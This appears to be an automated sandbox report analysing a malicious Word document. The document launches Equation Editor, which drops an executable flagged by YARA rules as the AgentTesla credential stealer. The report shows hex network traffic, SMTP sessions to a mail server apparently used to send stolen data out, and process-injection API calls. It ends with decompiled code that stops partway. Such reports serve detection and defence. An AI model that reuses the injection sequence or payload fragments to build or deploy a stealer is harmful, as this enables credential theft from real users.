Jan 27, 2021 19:29:37.780224085 CET	265	IN	Data Raw: 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 47 48 42 6d 48 47 48 47 48 42 6d 48 6d 42 48 6f 6f 6d 48 6f 47 6f 48 6f 47 72 48 6f 6f 6f 48 59 59 48 47 48 47 48 6f 77 48 47 48 47 48 47 48 47 48 42 6d 48 6d 48 47 48 47 Data Ascii: HGHGHGHGHGHGHGHGHGHGHGHGHGHBmHGHGHBmHmBHoomHoGoHoGrHoooHYYHGHGHowHGHGHGHGHBmHmHGHGHwHGHGHGHmHmHGHGHGHGHGHGHGHGHGHGHGHGHGHBmHGHGHBBHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHGHewHwYHmHGHGHGHGHGHKwHGHGHGHwHGHUHGHoUwHoYUHeHGHrmHrYHGHGHeHGHwHGHoomHGHGHBHwoBHo
Jan 27, 2021 19:29:37.780278921 CET	266	IN	Data Raw: 47 48 77 55 6d 48 59 48 6f 48 47 48 6f 42 77 48 65 4b 48 65 77 48 77 48 47 48 47 48 47 48 77 55 6d 48 59 48 77 48 47 48 6f 42 77 48 6d 47 48 59 4b 48 47 48 47 48 6f 47 48 6d 77 48 6f 65 47 48 6f 6f 6d 48 42 59 48 4b 48 47 48 6f 6f 77 48 65 77 48 Data Ascii: GHwUmHYHoHGHoBwHeKHewHwHGHGHGHwUmHYHwHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHBYHKHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHrKHKHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHomo
Jan 27, 2021 19:29:37.780329943 CET	267	IN	Data Raw: 48 47 48 47 48 6f 47 48 6d 77 48 6f 65 47 48 6f 6f 6d 48 6f 42 59 48 59 48 47 48 6f 6f 77 48 65 77 48 6f 48 47 48 47 48 47 48 6f 6d 6f 48 65 48 47 48 47 48 6f 48 65 4b 48 65 77 48 47 48 47 48 47 48 47 48 77 55 6d 48 59 48 47 48 47 48 6f 42 77 48 Data Ascii: HGHGHoGHmwHoeGHoomHoBYHYHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHworHoomHwwKHYHGHoowHewHeHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHeKHewHoHGHGHGHwUmHYHoHGHoBwHeKHewHwHGHGHGHwUmHYHwHGHoBwHmGHYKHGHGHoGHmwHoe
Jan 27, 2021 19:29:37.780371904 CET	269	IN	Data Raw: 48 65 48 47 48 47 48 47 48 6f 6d 6f 48 65 48 47 48 47 48 6f 48 65 4b 48 65 77 48 47 48 47 48 47 48 47 48 77 55 6d 48 59 48 47 48 47 48 6f 42 77 48 65 4b 48 65 77 48 6f 48 47 48 47 48 47 48 77 55 6d 48 59 48 6f 48 47 48 6f 42 77 48 65 4b 48 65 77 Data Ascii: HeHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHeKHewHoHGHGHGHwUmHYHoHGHoBwHeKHewHwHGHGHGHwUmHYHwHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHwmeHooHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHoKmHoomHYHowHGHoowHewHwHGHGHGHomoH
Jan 27, 2021 19:29:37.780411959 CET	270	IN	Data Raw: 48 77 55 6d 48 59 48 6f 48 47 48 6f 42 77 48 6d 47 48 59 4b 48 47 48 47 48 6f 47 48 6d 77 48 77 6f 72 48 6f 6f 6d 48 6f 55 6f 48 6f 65 48 47 48 6f 6f 77 48 65 77 48 65 48 47 48 47 48 47 48 6f 6d 6f 48 65 48 47 48 47 48 6f 48 65 4b 48 65 77 48 47 Data Ascii: HwUmHYHoHGHoBwHmGHYKHGHGHoGHmwHworHoomHoUoHoeHGHoowHewHeHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHeKHewHoHGHGHGHwUmHYHoHGHoBwHeKHewHwHGHGHGHwUmHYHwHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHoKKHoeHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGH
Jan 27, 2021 19:29:37.780442953 CET	272	IN	Data Raw: 6d 48 6f 47 55 48 6f 55 48 47 48 6f 6f 77 48 65 77 48 77 48 47 48 47 48 47 48 6f 6d 6f 48 65 48 47 48 47 48 6f 48 65 4b 48 65 77 48 47 48 47 48 47 48 47 48 77 55 6d 48 59 48 47 48 47 48 6f 42 77 48 65 4b 48 65 77 48 6f 48 47 48 47 48 47 48 77 55 Data Ascii: mHoGUHoUHGHoowHewHwHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHeKHewHoHGHGHGHwUmHYHoHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHoeYHoUHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHoKmHoomHoKeHoUHGHoowHewHwHGHGHGHomoHeHGHGHoHe
Jan 27, 2021 19:29:37.780481100 CET	273	IN	Data Raw: 6f 42 77 48 6d 47 48 59 4b 48 47 48 47 48 6f 47 48 6d 77 48 6f 65 47 48 6f 6f 6d 48 4b 65 48 6f 4b 48 47 48 6f 6f 77 48 65 77 48 6f 48 47 48 47 48 47 48 6f 6d 6f 48 65 48 47 48 47 48 6f 48 65 4b 48 65 77 48 47 48 47 48 47 48 47 48 77 55 6d 48 59 Data Ascii: oBwHmGHYKHGHGHoGHmwHoeGHoomHKeHoKHGHoowHewHoHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHmGHYKHGHGHoGHmwHoKmHoomHoweHoKHGHoowHewHwHGHGHGHomoHeHGHGHoHeKHewHGHGHGHGHwUmHYHGHGHoBwHeKHewHoHGHGHGHwUmHYHoHGHoBwHmGHYKHGHGHoGHmwHoeGHoomHoKUHoKHGHoow
Jan 27, 2021 19:29:37.780529022 CET	274	IN	Data Raw: 48 6f 48 6f 42 48 47 48 47 48 77 48 47 48 77 72 48 47 48 6f 47 42 48 6f 65 6d 48 47 48 6f 4b 48 47 48 47 48 47 48 47 48 77 4b 48 6d 72 48 77 48 47 48 6f 4b 6d 48 47 48 47 48 47 48 6f 48 47 48 47 48 6f 4b 48 47 48 6f 6f 6d 48 6d 65 48 47 48 47 48 Data Ascii: HoHoBHGHGHwHGHwrHGHoGBHoemHGHoKHGHGHGHGHwKHmrHwHGHoKmHGHGHGHoHGHGHoKHGHoomHmeHGHGHoowHwUmHomHoHGHoomHBoHGHGHoowHwUmHomHwHGHooUHwGHGHGHoGHwUmHomHeHGHwUmHowHoHGHmGHoHGHGHmeHoooHwwHGHGHoGHwUmHomHmHGHUBHUBHGHGHGHwUmHoeHmHGHmGHweHGHGHoGHwUmHomHUHGH
Jan 27, 2021 19:29:37.780571938 CET	276	IN	Data Raw: 6d 48 55 48 47 48 77 55 6d 48 6f 77 48 55 48 47 48 6d 47 48 77 6d 48 47 48 47 48 6f 47 48 77 55 6d 48 6f 77 48 77 48 47 48 6d 47 48 77 55 48 47 48 47 48 6f 47 48 77 6f 72 48 77 55 6d 48 6f 6d 48 42 48 47 48 77 55 6d 48 6f 77 48 65 48 47 48 77 55 Data Ascii: mHUHGHwUmHowHUHGHmGHwmHGHGHoGHwUmHowHwHGHmGHwUHGHGHoGHworHwUmHomHBHGHwUmHowHeHGHwUmHowHBHGHmGHwBHGHGHoGHoooHwKHGHGHoGHerHGHwUmHoeHmHGHmGHwrHGHGHoGHwUmHomHKHGHwUmHowHKHGHUrHoKrHwUUHwUUHwUUHwwoHoKHGHGHGHwUmHoeHmHGHwUmHwwHwHGHGHwKHoooHwYHGHGHoGHG
Jan 27, 2021 19:29:37.827893972 CET	277	IN	Data Raw: 48 47 48 6f 47 48 47 48 77 77 47 48 77 55 6d 48 6f 77 48 65 48 47 48 6f 6f 6f 48 65 47 48 47 48 47 48 6f 47 48 77 55 6d 48 6f 6d 48 47 48 47 48 55 42 48 47 48 47 48 47 48 47 48 77 55 6d 48 6f 77 48 47 48 47 48 6d 77 48 47 48 47 48 6f 48 6f 42 48 Data Ascii: HGHoGHGHwwGHwUmHowHeHGHoooHeGHGHGHoGHwUmHomHGHGHUBHGHGHGHGHwUmHowHGHGHmwHGHGHoHoBHGHGHwHGHwrHGHoGBHoemHGHoKHGHGHGHGHwKHmrHwHGHoKmHGHGHGHoHGHGHoKHGHoomHweeHGHGHoowHwUmHomHoHGHoomHKHoHGHoowHwUmHomHwHGHooUHwGHGHGHoGHwUmHomHeHGHwUmHowHoHGHmGHoHGHG

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 27, 2021 19:30:18.838618040 CET	587	49169	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:18.839448929 CET	49169	587	192.168.2.22	198.54.122.60	EHLO 724536
Jan 27, 2021 19:30:19.032927036 CET	587	49169	198.54.122.60	192.168.2.22	250-MTA-09.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 27, 2021 19:30:19.033739090 CET	49169	587	192.168.2.22	198.54.122.60	STARTTLS
Jan 27, 2021 19:30:19.228844881 CET	587	49169	198.54.122.60	192.168.2.22	220 Ready to start TLS
Jan 27, 2021 19:30:25.400098085 CET	587	49170	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:25.400990009 CET	49170	587	192.168.2.22	198.54.122.60	EHLO 724536
Jan 27, 2021 19:30:25.594579935 CET	587	49170	198.54.122.60	192.168.2.22	250-MTA-09.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 27, 2021 19:30:25.595061064 CET	49170	587	192.168.2.22	198.54.122.60	STARTTLS
Jan 27, 2021 19:30:25.788259029 CET	587	49170	198.54.122.60	192.168.2.22	220 Ready to start TLS
Jan 27, 2021 19:30:33.386825085 CET	587	49172	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:33.387015104 CET	49172	587	192.168.2.22	198.54.122.60	EHLO 724536
Jan 27, 2021 19:30:33.582669973 CET	587	49172	198.54.122.60	192.168.2.22	250-MTA-09.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 27, 2021 19:30:33.583038092 CET	49172	587	192.168.2.22	198.54.122.60	STARTTLS
Jan 27, 2021 19:30:33.778525114 CET	587	49172	198.54.122.60	192.168.2.22	220 Ready to start TLS
Jan 27, 2021 19:30:42.642733097 CET	587	49173	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:42.643021107 CET	49173	587	192.168.2.22	198.54.122.60	EHLO 724536
Jan 27, 2021 19:30:42.847354889 CET	587	49173	198.54.122.60	192.168.2.22	250-MTA-09.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 27, 2021 19:30:42.847765923 CET	49173	587	192.168.2.22	198.54.122.60	STARTTLS
Jan 27, 2021 19:30:43.051781893 CET	587	49173	198.54.122.60	192.168.2.22	220 Ready to start TLS
Jan 27, 2021 19:30:52.774681091 CET	587	49174	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:52.775216103 CET	49174	587	192.168.2.22	198.54.122.60	EHLO 724536
Jan 27, 2021 19:30:52.979588985 CET	587	49174	198.54.122.60	192.168.2.22	250-MTA-09.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 27, 2021 19:30:52.980285883 CET	49174	587	192.168.2.22	198.54.122.60	STARTTLS
Jan 27, 2021 19:30:53.184436083 CET	587	49174	198.54.122.60	192.168.2.22	220 Ready to start TLS
Jan 27, 2021 19:30:59.243333101 CET	587	49175	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Jan 27, 2021 19:30:59.243845940 CET	49175	587	192.168.2.22	198.54.122.60	EHLO 724536
Jan 27, 2021 19:30:59.437447071 CET	587	49175	198.54.122.60	192.168.2.22	250-MTA-09.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Jan 27, 2021 19:30:59.438045025 CET	49175	587	192.168.2.22	198.54.122.60	STARTTLS
Jan 27, 2021 19:30:59.631119013 CET	587	49175	198.54.122.60	192.168.2.22	220 Ready to start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 1464 Parent PID: 584

General

Start time:	19:29:37
Start date:	27/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f540000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2492 Parent PID: 584

General

Start time:	19:29:38
Start date:	27/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: poiuytrewsdfghjklmnbvcx.exe PID: 2572 Parent PID: 2492

General

Start time:	19:29:39
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Imagebase:	0x11e0000
File size:	246784 bytes
MD5 hash:	D0154FB70ABD786136AE9F68F285541C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: poiuytrewsdfghjklmnbvcx.exe PID: 2332 Parent PID: 2572

General

Start time:	19:29:47
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Imagebase:	0x11e0000
File size:	246784 bytes
MD5 hash:	D0154FB70ABD786136AE9F68F285541C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: poiuytrewsdfghjklmnbvcx.exe PID: 2712 Parent PID: 2572

General

Start time:	19:29:47
Start date:	27/01/2021
Path:	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Imagebase:	0x11e0000
File size:	246784 bytes
MD5 hash:	D0154FB70ABD786136AE9F68F285541C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: poiuytrewsdfghjklmnbvcx.exe PID: 2572 Parent PID: 2492 poiuytrewsdfghjklmnbvcx.exeCOMMON

Executed Functions

Function 001D4554, Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4796

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c415cd59c57866e780e9c67ffd870bdf926329f3e41c2525302daf93d7c2602d
Instruction ID: a679e03985f635f5f03025790022005b9391e12c94f90f15173b6b89d5ded367
Opcode Fuzzy Hash: c415cd59c57866e780e9c67ffd870bdf926329f3e41c2525302daf93d7c2602d
Instruction Fuzzy Hash: 5FA14871D002199FDF20CFA4CC81BEEBBB2BF49314F1585AAD849A7284DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001D4560, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4796

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7c65fe713ed5fbb995c199b7913ecac9649e50d25382fb3d26c4708727610064
Instruction ID: 5771578a3b1555e17270650c26393a8b90620918d38a10daedc01110dc1f103b
Opcode Fuzzy Hash: 7c65fe713ed5fbb995c199b7913ecac9649e50d25382fb3d26c4708727610064
Instruction Fuzzy Hash: E6915971D002198FEF20CFA4C8417EEBBB2BF49314F15856AD849A7384DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001D3CD1, Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 001D3D68

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 537dfc1f60af2c71dc066c9830479d41694e73fc4de7c515eaf8d83108aaf617
Instruction ID: 632f80e71413ad6a855fb60e3c4768b4f213531844d2eee318ecafec14029f8b
Opcode Fuzzy Hash: 537dfc1f60af2c71dc066c9830479d41694e73fc4de7c515eaf8d83108aaf617
Instruction Fuzzy Hash: F62126B19002499FCB10CFA9C884BDEBBF5FF49314F54882AE959A7340D7789A50CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D3CD8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 001D3D68

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 66454be64ed135e144464f588e46d6eaac1e1232e8f884ae51dc33a1b8185992
Instruction ID: f17735658a916866c44e25074e9b097aeacb5dbf6fa3b4e8cbd37e4224cc8300
Opcode Fuzzy Hash: 66454be64ed135e144464f588e46d6eaac1e1232e8f884ae51dc33a1b8185992
Instruction Fuzzy Hash: EC2128719002499FCB10CFA9C8847DEBBF5FF49314F50882AE959A7340D7789A50CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D353E, Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 001D35BE

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c9413aa115afbfb16ff6d8172e291b29b6e3e6023d4011c187a92541bd6b7f3b
Instruction ID: e7628ee4cb4d7504dea79b5b5395b8183e75dff27a1277336fd59328e3737ed2
Opcode Fuzzy Hash: c9413aa115afbfb16ff6d8172e291b29b6e3e6023d4011c187a92541bd6b7f3b
Instruction Fuzzy Hash: 0F211A719002098FDB10CFA9D8847EEBBF5EF49314F54882AD459A7340D778AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D3540, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 001D35BE

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a14adf4444a2daf54341b4fdbd0129670ae12a46f13cfb046072cdb9f4810af4
Instruction ID: dc78b7452360b4bb4ba4a31d9b20a64d252dc3cf5e41eb95eab2cdc119e06ae0
Opcode Fuzzy Hash: a14adf4444a2daf54341b4fdbd0129670ae12a46f13cfb046072cdb9f4810af4
Instruction Fuzzy Hash: EE2118719002098FDB10CFAAD8847EEBBF5EF49314F54882AD459A7340DB78AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D3FC8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001D4048

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4c4d694938e0ef903ecaca99b99d068667b79482666dffe8f96f06026e60971e
Instruction ID: 21044f94d6ecc6c0bb2327e11765c481e0fc11a037c782411ef373cff4080320
Opcode Fuzzy Hash: 4c4d694938e0ef903ecaca99b99d068667b79482666dffe8f96f06026e60971e
Instruction Fuzzy Hash: 9A21F8719002099FCB10CFA9D844BEEFBF5FF48314F50882AE959A7240D779A951CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D4B90, Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 001D4BFA

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c7583da43513c29a3e332910103e8a28a71656f74212bb3b0394956000f4c053
Instruction ID: 6a40b074b3403f7ccbec69556d130c76587b45c39d271ec13bb714a7746c2e98
Opcode Fuzzy Hash: c7583da43513c29a3e332910103e8a28a71656f74212bb3b0394956000f4c053
Instruction Fuzzy Hash: 522167719002088FCB10DFAAD8447DEBBF4EF99314F24881AD459A7340C779A544CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 001D3A10, Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001D3A86

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7cfcdd81e576d887f88f213b8ce586b938cc0ffb67199b2a26757746eb1edf5a
Instruction ID: 3f7e1b0c1fb4fa9c429351b40b0dd20f0e4ad5224605c1e1501ea0bb522a7fd7
Opcode Fuzzy Hash: 7cfcdd81e576d887f88f213b8ce586b938cc0ffb67199b2a26757746eb1edf5a
Instruction Fuzzy Hash: FC2136729002099FCB10CFA9D844BEEBBF5EF89314F14881AE559B7250C779A950CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D3A18, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001D3A86

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0c691295b33e3c923dd2efb2cf9811ca81a78a9bcc658c9d6224f8fd888d5cbe
Instruction ID: 03533587e3a78acb318cde17ac939ea708033ff32e289e2055bad53245f0b797
Opcode Fuzzy Hash: 0c691295b33e3c923dd2efb2cf9811ca81a78a9bcc658c9d6224f8fd888d5cbe
Instruction Fuzzy Hash: 8F1126719002099BCB10DFA9D844BDFBBF9EF89314F14881AD559B7250C775AA50CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D4B98, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 001D4BFA

Memory Dump Source

Source File: 00000004.00000002.2106275382.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: acf5ac28f321d13c71880c69a901e30d21fd8c86bc7f6c730ffebc99d9775c3a
Instruction ID: 39eafa248ce1051d8e8be5e0a5be9ebeadd0e5d92640e152d1e9be7110154d78
Opcode Fuzzy Hash: acf5ac28f321d13c71880c69a901e30d21fd8c86bc7f6c730ffebc99d9775c3a
Instruction Fuzzy Hash: C41125B19002098BCB10DFAAD8447EFFBF9AB89314F24881AC419B7340C779A940CBA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 011E415D, Relevance: .2, Instructions: 238
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E011E415D(signed int __eax, void* __ebx, signed char __ecx, void* __edi, signed int __esi) {
				signed char _t187;
				signed char _t188;
				signed char _t223;
				signed char _t227;
				signed char _t228;
				signed int _t230;
				signed char _t265;
				void* _t295;
				signed int _t296;
				void* _t304;
				void* _t313;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t353;

				_t304 = __edi;
				_t265 = __ecx;
				_t187 = __eax;
				asm("sbb eax, [ecx]");
				 *((intOrPtr*)(__edi + __esi + 9)) =  *((intOrPtr*)(__edi + __esi + 9)) + __eax;
				_t230 = __ebx + __ecx;
				asm("popfd");
				 *__eax =  *__eax + __eax;
				_t324 = _t323 + 1;
				asm("aaa");
				if ( *__eax <= 0) goto L1;
				 *((intOrPtr*)(__ecx + 0x34)) =  *((intOrPtr*)(__ecx + 0x34)) + _t230;
				asm("aad 0x9d");
				 *__eax =  *__eax + __eax;
				_t325 = _t324 + 1;
				asm("aaa");
				if( *__eax >= 0) {
					 *__eax =  *__eax + __eax;
					asm("sbb eax, [edx+0x36a101e1]");
					 *__eax =  *__eax + __eax;
					_t187 = __eax /  *__ecx;
					_t296 = __eax %  *__ecx;
					 *((intOrPtr*)(_t313 + 0x1a)) =  *((intOrPtr*)(_t313 + 0x1a)) + _t325;
					 *_t187 =  *_t187 + _t187;
					 *_t187 =  *_t187 + _t187;
					_t309 =  *(__ecx + _t230 * 8) * 0;
				}
				_t188 = _t187 ^ 0x000000d9;
				 *((intOrPtr*)(_t313 + 0x1a)) =  *((intOrPtr*)(_t313 + 0x1a)) + _t188;
				 *_t188 =  *_t188 + _t188;
				if( *_t188 >= 0) {
					L6:
					 *_t188 =  *_t188 + _t188;
					if ( *_t188 < 0) goto L9;
				} else {
					_t227 = _t265;
					_t265 = _t188;
					 *((intOrPtr*)(_t230 + 0x6b0000ef)) =  *((intOrPtr*)(_t230 + 0x6b0000ef)) + _t313;
					_t228 = _t227 ^ 0x00000049;
					 *((intOrPtr*)(_t230 + 0x64)) =  *((intOrPtr*)(_t230 + 0x64)) + _t296;
					 *_t228 =  *_t228 + _t228;
					_t188 = _t228 &  *(_t296 + 0x1b830189);
					 *_t188 =  *_t188 + _t188;
					_t353 = _t325 + 1;
					asm("aaa");
					if( *_t188 >= 0) {
						 *_t188 =  *_t188 + _t188;
						 *((intOrPtr*)(_t296 - 0x622afe77)) =  *((intOrPtr*)(_t296 - 0x622afe77)) - _t188;
